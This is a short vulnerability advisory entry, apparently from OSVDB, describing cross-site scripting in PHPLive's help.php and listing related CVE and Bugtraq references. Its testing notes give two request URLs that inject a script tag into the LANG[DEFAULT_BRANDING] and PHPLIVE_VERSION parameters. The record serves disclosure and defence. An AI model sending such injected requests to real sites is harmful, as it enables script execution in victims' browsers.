PHPLive help.php Multiple Variable XSS

2007-06-01T00:00:00
ID OSVDB:38380
Type osvdb
Reporter OSVDB
Modified 2007-06-01T00:00:00

Description

Manual Testing Notes

/phplive/help.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script> /phplive/help.php?PHPLIVE_VERSION=<script>alert(123);</script>

References:

Secunia Advisory ID:25441 Related OSVDB ID: 38381 Related OSVDB ID: 38382 Related OSVDB ID: 38383 Related OSVDB ID: 38379 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0047.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0011.html Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-06/0005.html FrSIRT Advisory: ADV-2007-2082 CVE-2007-3060 Bugtraq ID: 24276